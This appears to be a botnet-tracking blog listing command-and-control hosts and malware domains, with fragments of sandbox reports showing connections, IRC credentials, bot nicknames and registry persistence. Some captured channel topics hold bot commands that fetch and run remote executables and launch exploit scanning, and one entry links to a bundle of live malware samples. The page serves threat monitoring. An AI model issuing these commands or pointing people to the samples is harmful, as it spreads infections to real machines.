DNS Lookup Host Name IP Address testusa.helohmar.com 76.73.36.42 api.ipinfodb.com 67.212.74.82 www.craigslist.org 208.82.236.208 geo.craigslist.org 208.82.236.208 Download URLs http://67.212.74.82/v2/ip_query.php?key=4f7c7d0d524a3e9445217575619159f874a734aa16e97b87fc505f49de8e31a1&output=xml (api.ipinfodb.com) http://208.82.236.208/ (www.craigslist.org) http://208.82.236.208/ (www.craigslist.org) Outgoing connection to remote server: testusa.helohmar.com port 8800 Outgoing connection to remote server: testusa.helohmar.com port 8800 Outgoing connection to remote server: testusa.helohmar.com TCP port 8800 Outgoing connection to remote server: api.ipinfodb.com TCP port...
xvm-168-229.ghst.net (Botnet hosted with United Kingdom Gandi Uk Dedicated Hosting Servers)
Remote Host Port Number 217.70.188.30 5900 PASS Virus 92.243.28.194 5900 PASS Virus 95.142.168.229 5900 PASS Virus NICK VirUs-xlaixqgo USER VirUs “” “zbo” : 8Coded 8Ahmed.Ramzey@Hotmail.Com.. NICK VirUs-firqfllm USER VirUs “” “zux” : NICK VirUs-nqcgfvif USER VirUs “” “pcm” : NICK VirUs-whzmmafw USER VirUs “” “kga” : NICK VirUs-rffujwic USER VirUs “” “xvi” : NICK VirUs-ubjkqifu...
mydrivers.babypin.net (Botnet hosted with United States Orange Vpls Inc. D/b/a Krypt Technologies)
mydrivers.babypin.net ip: 109.196.130.50 mydrivers.babypin.net ip: 109.196.130.66 mydrivers.babypin.net ip: 98.126.214.82 Remote Host Port Number 112.78.112.208 80 218.85.133.201 80 98.126.214.82 6682 PASS laorosr USER SP2-364 * 0 :COMPUTERNAME MODE [N00_USA_XP_6656961] @ -ix MODE #dpi -ix Master86 changes topic to ‘.asc -S|.http http://208.53.183.181/icsy.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all...
www.52fa.net (malware hosted with United States Missoula Sharktech Internet Services)
DNS Lookup Host Name IP Address 0 127.0.0.1 www.52fa.net www.52fa.net 204.188.243.34 UDP Connections Remote IP Address: 127.0.0.1 Port: 1033 Send Datagram: 2 packet(s) of size 1 Recv Datagram: 2 packet(s) of size 1 Download URLs http://204.188.243.34/wm1/count.asp?mac=00:0C:F1:85:8C:74&ver=1&os=nothing (www.52fa.net) Outgoing connection to remote server: www.52fa.net TCP port 80 Registry Changes by all processes Create or Open Changes...
210.170.62.115 (Botnet hosted in Japan with Japan Rcp Co Ltd and United States Chicago Hostforweb Inc)
Capability to manipulate a user list control in instant messenger (IM) programs such as AOL, Yahoo! Messenger, Skype. An affected user’s contact list could be used by an IM worm in order to replicate over the IM network. 210.170.62.115:2345 pass xxx Nick: NEW-[AUT|00|P|85861] Username: XP-1777 Server Pass: xxx Joined Channel: #!gf! with Password test Channel...
april2.botsgod.info (VirUs the biggest lamer with big botnet hosted with United Kingdom Gandi Uk Dedicated Hosting Servers)
april2.botsgod.info ip: 92.243.28.194 april2.botsgod.info ip: 95.142.168.229 april2.botsgod.info ip: 217.70.188.30 Remote Host Port Number 217.70.188.30 4949 92.243.28.194 4949 95.142.168.229 4949 NICK {NOVY}[USA][XP-SP2]043406 USER VirUs “” “lol” :0320 NICK [USA][XP-SP2]073489 USER VirUs “” “lol” :7113 USER VirUs “” “lol” :4947 NICK [USA][XP-SP2]725879 USER VirUs “” “lol” :8170 NICK [USA][XP-SP2]710812 USER VirUs “” “lol” :0319 NICK [USA][XP-SP2]250195 USER...
Around 10 MB of samples from different malware
Everything is in the title. You can download them here: http://1edeb898.uberpicz.com
medogrgr.no-ip.biz (bifrose hacker from Saudi Arabia Riyadh)
DNS Lookup Host Name IP Address medogrgr.no-ip.biz 188.49.5.146 Outgoing connection to remote server: medogrgr.no-ip.biz TCP port 81 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9D71D88C-C598-4935-C5D1-43AA4DB90836} “stubpath” = [REG_EXPAND_SZ, value: C:\WINDOWS\Bifrost\server.exe s] HKEY_LOCAL_MACHINE\SOFTWARE\Bifrost “nck” = [REG_BINARY, size: 16 bytes] HKEY_CURRENT_USER\Software\Bifrost “klg” = [REG_BINARY, size: 1 bytes] Reads HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Advanced INF Setup “AdvpackLogFile” HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal...
98.126.44.98 (Botnet hosted with kryptservers.com USA California)
Still USA hosting involved in botnet hosting. Remote Host Port Number 208.53.183.219 80 208.53.183.73 80 208.53.183.92 80 98.126.44.98 8100 PASS laorosr ircd here MODE #! -ix MODE #Ma -ix USER SP2-650 * 0 :COMPUTERNAME MODE [N00_USA_XP_9718720] @ -ix MODE #dpi -ix Joins channel: :#! #! :.asc-S|.http http://208.53.183.217/use13.exe|.asc exp_all 30 5 0 -a-r -e|.asc exp_all 30...
bss-crypt.no-ip.info
Processes Created PId Process Name Image Name 0x378 cc.exe C:\WINDOWS\cc.exe Threads Created PId Process Name TId Start Start Mem Win32 Start Win32 Start Mem 0x2ac lsass.exe 0x298 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE 0x348 svchost.exe 0xf8 0x7c810856 MEM_IMAGE 0x7c910760 MEM_IMAGE 0x378 cc.exe 0x374 0x7c810867 MEM_IMAGE 0x4973f0 MEM_IMAGE 0x3f4 svchost.exe 0x67c 0x7c810856 MEM_IMAGE 0x77e76bf0 MEM_IMAGE DNS Queries DNS Query Text bss-crypt.no-ip.info...